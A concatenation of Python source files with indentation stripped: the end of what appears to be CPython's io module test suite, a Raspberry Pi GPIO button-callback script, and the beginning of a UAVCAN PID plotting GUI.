'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_removed_u_mode(self):
# "U" mode has been removed in Python 3.9
for mode in ("U", "rU", "r+U"):
with self.assertRaises(ValueError) as cm:
self.open(support.TESTFN, mode)
self.assertIn('invalid mode', str(cm.exception))
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a')
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
def test_check_encoding_errors(self):
# bpo-37388: open() and TextIOWrapper must check encoding and errors
# arguments in dev mode
mod = self.io.__name__
filename = __file__
invalid = 'Boom, Shaka Laka, Boom!'
code = textwrap.dedent(f'''
import sys
from {mod} import open, TextIOWrapper
try:
open({filename!r}, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(21)
try:
open({filename!r}, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(22)
fp = open({filename!r}, "rb")
with fp:
try:
TextIOWrapper(fp, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(23)
try:
TextIOWrapper(fp, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(24)
sys.exit(10)
''')
proc = assert_python_failure('-X', 'dev', '-c', code)
self.assertEqual(proc.rc, 10, proc)
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
buttonClassTest.py | import RPi.GPIO as GPIO
import threading
GPIO.setmode(GPIO.BCM)
class ButtonStuff:
def __init__(self):
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(27, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(22, GPIO.IN, pull_up_down=GPIO.PUD_UP)
self.boolean = True
self.doStuff()
# now we'll define the threaded callback function
# this will run in another thread when our event is detected
def my_callback(self):
# we need to run this in new thread, so current thread finishes execution and the interrupt event queue can continue
t1 = threading.Thread(target=self.thread1)
t1.start()
def thread1(self):
while self.boolean:
print("lala")
def my_callback2(self):
self.boolean = not self.boolean
print("button2")
def doStuff(self):
print("Make sure you have a button connected so that when pressed")
print("it will connect GPIO port 23 (pin 16) to GND (pin 6)\n")
print("You will also need a second button connected so that when pressed")
print("it will connect GPIO port 24 (pin 18) to 3V3 (pin 1)")
# raw_input("Press Enter when ready\n>")
# The GPIO.add_event_detect() line below set things up so that
# when a rising edge is detected on port 24, regardless of whatever
# else is happening in the program, the function "my_callback" will be run
# It will happen even while the program is waiting for
# a falling edge on the other button.
GPIO.add_event_detect(27, GPIO.RISING, callback=lambda x: self.my_callback())
GPIO.add_event_detect(22, GPIO.RISING, callback=lambda x: self.my_callback2())
# GPIO.add_event_detect(22, GPIO.FALLING, callback=lambda x: self.my_callback(), bouncetime=300)
# GPIO.add_event_detect(self.LOOPBUTTON2, GPIO.FALLING, callback=lambda x: self.loopButton(1), bouncetime=300)
# GPIO.add_event_detect(self.LOOPBUTTON3, GPIO.FALLING, callback=lambda x: self.loopButton(2), bouncetime=300)
try:
print("Waiting for falling edge on port 23")
GPIO.wait_for_edge(17, GPIO.FALLING)
print ("Falling edge detected. Here endeth the second lesson.")
except KeyboardInterrupt:
GPIO.cleanup() # clean up GPIO on CTRL+C exit
GPIO.cleanup() # clean up GPIO on normal exit
def main():
bt = ButtonStuff()
if __name__ == '__main__':main() |
pid_plot.py | import argparse
import logging
import sys
import threading
import time
import uavcan
import numpy as np
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
from ..network.UavcanNode import UavcanNode
from ..network.NodeStatusMonitor import NodeStatusMonitor
from ..network.SetpointPublisher import ControlTopic, SetpointPublisher
from ..viewers.LivePlotter import LivePlotter
from ..viewers.Selector import Selector
from ..viewers.NestedDict import NestedDictView
from ..viewers.helpers import vstack, hstack
from ..viewers.wrappers import LineEdit, ComboBox
from .param_tree import ParameterTreeModel
def argparser(parser=None):
parser = parser or argparse.ArgumentParser(description=__doc__)
parser.add_argument("interface", help="Serial port or SocketCAN interface")
parser.add_argument("--dsdl", "-d", help="DSDL path", required=True)
parser.add_argument("--node_id", "-n", help="UAVCAN Node ID", default=127)
parser.add_argument('--verbose', '-v', action='count', default=0)
return parser
class PidViewer(QtGui.QWidget):
def __init__(self, parent = None):
super(PidViewer, self).__init__(parent)
self.node_selector = Selector()
self.pid_loop_selector = Selector()
self.plot = LivePlotter(buffer_size=300)
self.params_view = NestedDictView()
self.save_button = QtGui.QPushButton('Save')
self.topic = ComboBox(title="Topic \t", callback=None, items=list(ControlTopic), parent=parent)
self.value_min = LineEdit(title="Value min \t", callback=None, parent=parent)
self.value_max = LineEdit(title="Value max \t", callback=None, parent=parent)
self.period = LineEdit(title="Period [s] \t", callback=None, parent=parent)
self.setLayout(vstack([
self.node_selector,
hstack([
vstack([
self.params_view,
self.save_button,
self.topic,
self.value_min,
self.value_max,
self.period,
]),
vstack([
self.pid_loop_selector,
self.plot.widget,
]),
]),
]))
self.setWindowTitle("PID Plotter")
self.show()
class SetpointPublisherModel:
def __init__(self, node, topic, motor, value_min, value_max, period):
self.publisher = SetpointPublisher(node, ControlTopic(topic), motor, value_min, value_max, period)
def update_motor(self, value):
self.publisher.motor = int(value)
self.publisher.update()
def update_topic(self, value):
self.publisher.topic = ControlTopic(value)
self.publisher.update()
def update_value_min(self, value_min):
self.publisher.value_min = float(value_min)
self.publisher.update()
def update_value_max(self, value_max):
self.publisher.value_max = float(value_max)
self.publisher.update()
def update_period(self, value):
self.publisher.period = float(value)
self.publisher.update()
class PidFeedbackRecorder():
nodes = []
on_new_node_callback = None
tracked_node = None
PID_LOOPS = ['Current', 'Velocity', 'Position']
tracked_pid_loop = PID_LOOPS[0]
EMPTY_DATA = {'setpoint': {'time': np.array([]), 'value': np.array([])},
'measured': {'time': np.array([]), 'value': np.array([])}, }
data = EMPTY_DATA
def __init__(self, node):
self.logger = logging.getLogger('PidFeedbackRecorder')
self.node = node
self.data_lock = threading.RLock()
self.monitor = NodeStatusMonitor(node)
self.monitor.on_new_node(self._update_nodes)
self.setpt_pub = SetpointPublisherModel(node, topic='voltage', motor=1, value_min=0, value_max=0, period=1)
self.clear()
self.node.add_handler(uavcan.thirdparty.cvra.motor.feedback.CurrentPID, self._current_pid_callback)
self.node.add_handler(uavcan.thirdparty.cvra.motor.feedback.VelocityPID, self._velocity_pid_callback)
self.node.add_handler(uavcan.thirdparty.cvra.motor.feedback.PositionPID, self._position_pid_callback)
self.params_model = ParameterTreeModel(node)
self.params_model.on_new_node(self._update_nodes)
def on_new_node(self, callback):
self.on_new_node = callback
def node_id_to_name(self, node_id):
return self.monitor.node_id_to_name(node_id)
def clear(self):
with self.data_lock:
self.data = self.EMPTY_DATA
def _update_nodes(self):
known_nodes = self.monitor.known_nodes
nodes_with_name = {k: v for k, v in known_nodes.items() if 'name' in v.keys()}
self.nodes = list(nodes_with_name[node]['name'] for node in nodes_with_name)
if self.on_new_node:
self.on_new_node()
def _current_pid_callback(self, event):
if self.tracked_pid_loop == 'Current':
self._pid_callback(node_id=event.transfer.source_node_id,
setpoint=event.message.current_setpoint,
measured=event.message.current)
def _velocity_pid_callback(self, event):
if self.tracked_pid_loop == 'Velocity':
self._pid_callback(node_id=event.transfer.source_node_id,
setpoint=event.message.velocity_setpoint,
measured=event.message.velocity)
def _position_pid_callback(self, event):
if self.tracked_pid_loop == 'Position':
self._pid_callback(node_id=event.transfer.source_node_id,
setpoint=event.message.position_setpoint,
measured=event.message.position)
def _pid_callback(self, node_id, setpoint, measured):
node_name = self.monitor.node_id_to_name(node_id)
if self.tracked_node is not None and self.tracked_node == node_name:
current_time = time.time()
self.data['setpoint']['time'] = np.append(self.data['setpoint']['time'], current_time)
self.data['measured']['time'] = np.append(self.data['measured']['time'], current_time)
self.data['setpoint']['value'] = np.append(self.data['setpoint']['value'], setpoint)
self.data['measured']['value'] = np.append(self.data['measured']['value'], measured)
class PidPlotController:
def __init__(self, node):
self.logger = logging.getLogger('PidPlotController')
self.node = node
self.model = PidFeedbackRecorder(node)
